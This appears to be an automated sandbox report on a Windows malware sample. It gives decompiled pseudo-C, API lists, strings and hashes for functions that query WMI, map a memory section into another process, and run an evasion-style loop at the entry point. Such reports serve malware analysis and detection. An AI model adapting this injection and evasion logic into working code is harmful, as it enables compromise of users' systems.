0x0008d2cc
0x0008d2d1
0x0008d2d6
0x0008d2d6
0x0008d2dc
0x0008d2e3
0x0008d2e4
0x0008d2f1
0x0008d304
0x0008d309
0x0008d30e
0x0008d317
0x0008d317
0x0008d31d
0x0008d322
0x0008d328
0x0008d32e
0x0008d333
0x0008d33c
0x0008d33e
0x0008d345
0x0008d345
0x0008d34b
0x0008d353
0x0008d358
0x0008d359
0x0008d35e
0x0008d367
0x0008d369
0x0008d374
0x0008d374
0x0008d37d
0x0008d385
0x0008d38c
0x0008d391
0x0008d3a0
0x0008d3b8
0x0008d3bf
0x0008d3cd
0x0008d3df
0x0008d3e6
0x0008d3f3
0x00000000

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetCurrentProcessId.KERNEL32 ref: 0008D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
GetCurrentProcess.KERNEL32 ref: 0008D09F
GetLastError.KERNEL32 ref: 0008D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
GetLastError.KERNEL32 ref: 0008D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
GetCurrentProcess.KERNEL32 ref: 0008D20E
memset.MSVCRT ref: 0008D229
GetVersionExA.KERNEL32(00000000), ref: 0008D234
GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
GetSystemInfo.KERNEL32(?), ref: 0008D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287

Strings

SystemDrive, xrefs: 0008D353, 0008D35E, 0008D373
%s\%s, xrefs: 0008D2F9
TEMP, xrefs: 0008D328, 0008D333, 0008D344
TEMP, xrefs: 0008D2F3
USERPROFILE, xrefs: 0008D2E4, 0008D312

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3876402152-2706916422
Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x0008db45
0x0008db4b
0x0008db52
0x0008db55
0x0008db58
0x0008db5d
0x0008db5f
0x0008db64
0x0008dfac
0x0008dfac
0x0008db71
0x0008db73
0x0008db76
0x0008db79
0x0008df91
0x0008df97
0x0008dfa1
0x00000000
0x0008dfa6
0x0008db84
0x0008db8b
0x0008db92
0x0008db95
0x0008db9a
0x0008db9c
0x0008db9f
0x0008dba2
0x0008dba3
0x0008dbac
0x0008dbb2
0x0008dbb5
0x0008dbbe
0x0008dbc3
0x0008dbc8
0x0008dbdf
0x0008dbec
0x0008dbef
0x0008dbf6
0x0008dbfb
0x0008dc02
0x0008dc07
0x0008dc0e
0x0008dc10
0x0008dc1c
0x0008dc1f
0x0008dc21
0x0008df81
0x0008df82
0x0008df8b
0x00000000
0x0008df8b
0x0008dc27
0x0008dc2a
0x0008dc2d
0x0008dc30
0x0008dc32
0x0008df4d
0x0008df50
0x0008df53
0x0008df55
0x0008df77
0x0008df7c
0x0008df57
0x0008df5a
0x0008df65
0x0008df6c
0x0008df6c
0x00000000
0x00000000
0x00000000
0x00000000
0x0008dc38
0x0008dc38
0x0008dc4a
0x0008dc4d
0x0008dc4f
0x00000000
0x00000000
0x0008dc57
0x0008dc5a
0x0008dc5d
0x0008dc60
0x0008dc63
0x0008dc66
0x00000000
0x00000000
0x0008dc6c
0x0008dc7a
0x0008dc7d
0x0008dc7f
0x0008dc98
0x0008dca7
0x0008dcaf
0x0008dcaf
0x0008dcb2
0x0008dcb9
0x0008dcbd
0x0008dcc3
0x0008dcc5
0x0008df35
0x0008df3b
0x0008df41
0x0008df44
0x0008df44
0x00000000
0x0008df44
0x0008dcd4
0x0008dce8
0x0008dcec
0x0008dcee
0x0008dcf3
0x0008df02
0x0008df08
0x0008df13
0x0008df1e
0x0008df24
0x0008df2a
0x0008df2d
0x00000000
0x0008df2d
0x0008dcf9
0x0008ded0
0x0008ded0
0x0008ded3
0x0008ded6
0x00000000
0x00000000
0x0008dd01
0x0008dd09
0x0008dd10
0x0008dd16
0x0008dd18
0x00000000
0x00000000
0x0008dd21
0x0008dd36
0x0008dd3c
0x0008dd45
0x0008dd48
0x0008dd4b
0x0008dd4d
0x0008dec3
0x0008dec6
0x0008decf
0x0008decf
0x00000000
0x0008decf
0x0008dd5d
0x0008dd60
0x0008dd67
0x0008dd6d
0x0008dd70
0x0008dd73
0x0008dd76
0x0008dd79
0x0008ddb5
0x0008ddb5
0x0008ddb8
0x0008de64
0x0008de78
0x0008de88
0x0008de8c
0x0008de8e
0x0008dea5
0x0008dea9
0x0008deb2
0x0008debd
0x00000000
0x0008debd
0x0008de94
0x0008de95
0x0008de9a
0x0008de9a
0x0008de9c
0x0008de9d
0x0008dea2
0x00000000
0x0008dea2
0x0008ddbe
0x0008ddbe
0x0008ddc1
0x0008de2c
0x0008de40
0x0008de50
0x0008de54
0x0008de56
0x00000000
0x00000000
0x0008de5c
0x0008de5d
0x00000000
0x0008de5d
0x0008ddc3
0x0008ddc3
0x0008ddc6
0x00000000
0x00000000
0x0008ddc8
0x0008ddcb
0x00000000
0x00000000
0x0008ddcd
0x0008ddcd
0x0008ddd3
0x0008ddef
0x0008ddfe
0x0008de07
0x0008de0c
0x0008de0f
0x0008de15
0x0008de15
0x0008de1a
0x0008de26
0x00000000
0x0008de26
0x0008ddd8
0x00000000
0x0008ddd8
0x0008dd7b
0x0008dda2
0x0008dda7
0x0008ddac
0x0008ddae
0x0008ddae
0x00000000
0x0008ddac
0x0008dd7d
0x0008dd7d
0x0008dd80
0x00000000
0x00000000
0x0008dd86
0x0008dd86
0x0008dd89
0x00000000
0x00000000
0x0008dd8f
0x0008dd8f
0x0008dd92
0x00000000
0x00000000
0x0008dd98
0x0008dd9b
0x00000000
0x00000000
0x0008dd9d
0x00000000
0x0008dd9d
0x0008dedf
0x0008dee5
0x0008deeb
0x0008deee
0x0008def1
0x0008def1
0x0008def4
0x0008def5
0x0008def8
0x0008defa
0x00000000
0x00000000
0x0008df4a
0x0008df4a
0x00000000
0x0008df4a
0x0008dc81
0x0008dc87
0x00000000
0x0008dc87
0x0008df47
0x00000000
0x0008dbca
0x0008dbcf
0x0008dbd4
0x00000000
0x0008dbd8

APIs

Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
SysFreeString.OLEAUT32(?), ref: 0008DF82
SysFreeString.OLEAUT32(?), ref: 0008DF8B

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

FALSE, xrefs: 0008DDAE
TRUE, xrefs: 0008DDA7

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
Opcode Fuzzy Hash: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xf0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0x12af8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0x12af8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xf0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}

0x0008c6c6
0x0008c6cd
0x0008c6cf
0x0008c6d1
0x0008c6d3
0x0008c6d6
0x0008c6d9
0x0008c6dc
0x0008c6df
0x0008c6e2
0x0008c6e5
0x0008c6ef
0x0008c6f2
0x0008c6f9
0x0008c6fe
0x0008c6fe
0x0008c704
0x0008c706
0x0008c70f
0x0008c8b5
0x0008c8b9
0x0008c8be
0x0008c8c4
0x0008c8c7
0x0008c8c7
0x0008c8cb
0x0008c8d0
0x0008c8d5
0x0008c8e2
0x0008c8e2
0x0008c8eb
0x0008c8ed
0x0008c8f5
0x0008c8f5
0x0008c8fc
0x0008c8fc
0x0008c718
0x0008c719
0x0008c71e
0x0008c724
0x0008c726
0x0008c727
0x0008c728
0x0008c72d
0x0008c72e
0x0008c738
0x00000000
0x00000000
0x0008c743
0x0008c74d
0x0008c757
0x0008c75a
0x0008c760
0x0008c767
0x0008c768
0x0008c769
0x0008c772
0x0008c773
0x0008c774
0x0008c776
0x0008c779
0x0008c77c
0x0008c77f
0x0008c782
0x0008c78e
0x0008c7b0
0x0008c7b8
0x0008c7bb
0x0008c7c6
0x0008c7c6
0x0008c7b8
0x0008c7cc
0x0008c7d5
0x0008c7d7
0x0008c7d8
0x0008c7da
0x0008c7db
0x0008c7dc
0x0008c7dd
0x0008c7e1
0x0008c7e8
0x0008c7e9
0x0008c7f1
0x0008c8b2
0x00000000
0x0008c7f7
0x0008c7f7
0x0008c7f9
0x0008c7fa
0x0008c7ff
0x0008c800
0x0008c801
0x0008c802
0x0008c803
0x0008c809
0x0008c80a
0x0008c80f
0x0008c810
0x0008c818
0x00000000
0x00000000
0x0008c82e
0x0008c830
0x0008c837
0x00000000
0x00000000
0x0008c848
0x0008c84e
0x0008c856
0x0008c859
0x0008c85f
0x0008c86f
0x0008c87b
0x0008c880
0x0008c886
0x0008c896
0x0008c8a2
0x0008c8aa
0x00000000
0x0008c8aa

APIs

RegisterClassExA.USER32 ref: 0008C785
CreateWindowExA.USER32 ref: 0008C7B0
DestroyWindow.USER32 ref: 0008C7BB
UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

0, xrefs: 0008C74D
cdcdwqwqwq, xrefs: 0008C76A
sadccdcdsasa, xrefs: 0008C73E

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
Opcode Fuzzy Hash: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0x12af8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}

0x00085f82
0x00085f92
0x00085f9c
0x000860d0
0x000860c3
0x00000000
0x000860c5
0x000860d7
0x00086098
0x00000000
0x00086098
0x00085fa2
0x00085faa
0x00085fb1
0x00085fb3
0x00000000
0x00085fc6
0x00085fc6
0x00085fcc
0x00085fd2
0x00085fe2
0x00085fe7
0x00085fef
0x00085ff7
0x00086013
0x00086018
0x0008601b
0x0008601d
0x0008601f
0x0008602c
0x00086035
0x0008603e
0x00086043
0x00086044
0x00086052
0x0008605c
0x0008606d
0x00086072
0x00086079
0x00086080
0x00086083
0x0008608f
0x00086090
0x0008609c
0x000860a5
0x000860a9
0x000860b7
0x000860ba
0x000860c1
0x00000000
0x00000000
0x00000000
0x000860c1
0x00086092
0x00086097
0x00000000
0x00085ff7

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
SetLastError.KERNEL32(000000AA), ref: 000860D7

Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839

GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
GetLastError.KERNEL32 ref: 00085FEF
memset.MSVCRT ref: 00086013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
GetFileAttributesW.KERNEL32(00000000), ref: 00086083

Strings

Hello qqq, xrefs: 00085F8D

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 1203100507-3610097158
Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
